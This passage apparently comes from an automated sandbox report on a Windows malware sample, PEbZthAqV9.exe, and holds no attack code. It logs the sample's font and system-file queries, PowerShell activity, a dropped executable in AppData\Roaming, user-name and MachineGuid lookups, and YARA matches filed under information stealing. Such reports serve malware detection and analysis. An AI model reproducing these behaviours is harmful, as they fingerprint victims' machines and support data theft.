Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\PEbZthAqV9.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeQueries volume information: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0040A0B0 GetLocalTime,wsprintfW,18_2_0040A0B0
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004195F8 GetUserNameW,18_2_004195F8
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004468DC _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,18_2_004468DC
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  Source: Yara match; File source: 0.2.PEbZthAqV9.exe.7410000.4.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.PEbZthAqV9.exe.7410000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.PEbZthAqV9.exe.3d6e790.3.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.PEbZthAqV9.exe.3d6e790.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 00000000.00000002.1834812761.0000000007410000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000000.00000002.1831199918.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 18.2.myTuDsvNcebev.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.PEbZthAqV9.exe.48f8790.2.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.PEbZthAqV9.exe.4883170.1.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 18.2.myTuDsvNcebev.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.PEbZthAqV9.exe.48f8790.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.PEbZthAqV9.exe.4883170.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 00000012.00000002.1910984680.000000000124B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
